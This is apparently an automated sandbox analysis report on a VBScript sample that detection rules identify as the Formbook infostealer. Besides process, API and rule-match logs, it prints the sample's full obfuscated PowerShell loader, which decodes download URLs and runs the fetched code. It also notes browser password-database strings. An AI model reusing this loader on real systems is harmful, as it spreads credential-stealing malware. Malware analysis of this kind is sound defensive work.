          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132AB0 NtWaitForSingleObject,10_2_22132AB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132AD0 NtReadFile,10_2_22132AD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132AF0 NtWriteFile,10_2_22132AF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132B60 NtClose,10_2_22132B60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132B80 NtQueryInformationFile,10_2_22132B80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132BA0 NtEnumerateValueKey,10_2_22132BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132BF0 NtAllocateVirtualMemory,10_2_22132BF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132BE0 NtQueryValueKey,10_2_22132BE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221339B0 NtGetContextThread,10_2_221339B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132E30 NtWriteVirtualMemory,10_2_22132E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132E80 NtReadVirtualMemory,10_2_22132E80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132EA0 NtAdjustPrivilegesToken,10_2_22132EA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132EE0 NtQueueApcThread,10_2_22132EE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132F30 NtCreateSection,10_2_22132F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132F60 NtCreateProcessEx,10_2_22132F60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132F90 NtProtectVirtualMemory,10_2_22132F90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132FB0 NtResumeThread,10_2_22132FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132FA0 NtQuerySection,10_2_22132FA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132FE0 NtCreateFile,10_2_22132FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132C00 NtQueryInformationProcess,10_2_22132C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132C60 NtCreateKey,10_2_22132C60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132CA0 NtQueryInformationToken,10_2_22132CA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132CC0 NtQueryVirtualMemory,10_2_22132CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132CF0 NtOpenProcess,10_2_22132CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22133D10 NtOpenProcessToken,10_2_22133D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132D10 NtMapViewOfSection,10_2_22132D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132D00 NtSetInformationFile,10_2_22132D00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132D30 NtUnmapViewOfSection,10_2_22132D30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22133D70 NtOpenThread,10_2_22133D70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132DB0 NtEnumerateKey,10_2_22132DB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132DD0 NtDelayExecution,10_2_22132DD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22132DF0 NtQuerySystemInformation,10_2_22132DF0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848A7B1364_2_00007FF848A7B136
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848A7BEFB4_2_00007FF848A7BEFB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0490EDF06_2_0490EDF0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0490F6C06_2_0490F6C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0490EAA86_2_0490EAA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A027410_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A010_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B2C010_2_2211B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A12ED10_2_221A12ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B132D10_2_221B132D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220ED34C10_2_220ED34C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BA35210_2_221BA352
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2214739A10_2_2214739A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210E3F010_2_2210E3F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C03E610_2_221C03E6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221070C010_2_221070C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AF0CC10_2_221AF0CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B70E910_2_221B70E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BF0E010_2_221BF0E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2219A11810_2_2219A118
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F010010_2_220F0100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2218815810_2_22188158
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221CB16B10_2_221CB16B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EF17210_2_220EF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2213516C10_2_2213516C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210B1B010_2_2210B1B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C01AA10_2_221C01AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B81CC10_2_221B81CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B16CC10_2_221B16CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211C6E010_2_2211C6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212475010_2_22124750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210077010_2_22100770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BF7B010_2_221BF7B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FC7C010_2_220FC7C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BF43F10_2_221BF43F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B244610_2_221B2446
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F146010_2_220F1460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AE4F610_2_221AE4F6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210053510_2_22100535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B757110_2_221B7571
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C059110_2_221C0591
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2219D5B010_2_2219D5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BFA4910_2_221BFA49
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B7A4610_2_221B7A46
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22173A6C10_2_22173A6C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FEA8010_2_220FEA80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22145AA010_2_22145AA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2219DAAC10_2_2219DAAC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221ADAC610_2_221ADAC6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BAB4010_2_221BAB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BFB7610_2_221BFB76
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211FB8010_2_2211FB80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B6BD710_2_221B6BD7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22175BF010_2_22175BF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2213DBF910_2_2213DBF9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216D80010_2_2216D800
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210284010_2_22102840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210A84010_2_2210A840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E68B810_2_220E68B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212E8F010_2_2212E8F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221038E010_2_221038E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210995010_2_22109950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211B95010_2_2211B950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211696210_2_22116962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221029A010_2_221029A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221CA9A610_2_221CA9A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BEE2610_2_221BEE26
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100E5910_2_22100E59
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22112E9010_2_22112E90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BCE9310_2_221BCE93
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22109EB010_2_22109EB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BEEDB10_2_221BEEDB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BFF0910_2_221BFF09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22120F3010_2_22120F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22142F2810_2_22142F28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22174F4010_2_22174F40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22101F9210_2_22101F92
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BFFB110_2_221BFFB1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F2FC810_2_220F2FC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210CFE010_2_2210CFE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22100C0010_2_22100C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22179C3210_2_22179C32
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0CB510_2_221A0CB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BFCF210_2_221BFCF2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F0CF210_2_220F0CF2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2210AD0010_2_2210AD00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B1D5A10_2_221B1D5A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22103D4010_2_22103D40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B7D7310_2_221B7D73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22118DBF10_2_22118DBF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211FDC010_2_2211FDC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220FADE010_2_220FADE0
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_03632B8C11_2_03632B8C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_0362C22811_2_0362C228
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_0362C22C11_2_0362C22C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_0364B04C11_2_0364B04C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_0362C44C11_2_0362C44C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_0362A4CC11_2_0362A4CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 2216EA12 appears 84 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 2217F290 appears 105 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 22135130 appears 36 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 220EB970 appears 268 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 22147E54 appears 91 times
          Source: 6 654398.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6180
          Source: unknownProcess created: Commandline size = 6180
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6180Jump to behavior
          Source: amsi32_6656.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@15/8@3/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\spgelseshistories.HovJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsrzxlfk.3qw.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs"
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;Chefstoles.exe&apos;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7156
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6656
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: cmdkey.exe, 0000000C.00000002.3466952802.0000000003211000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3357501122.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3466952802.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3466952802.00000000031E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 6 654398.vbsReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
          Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO 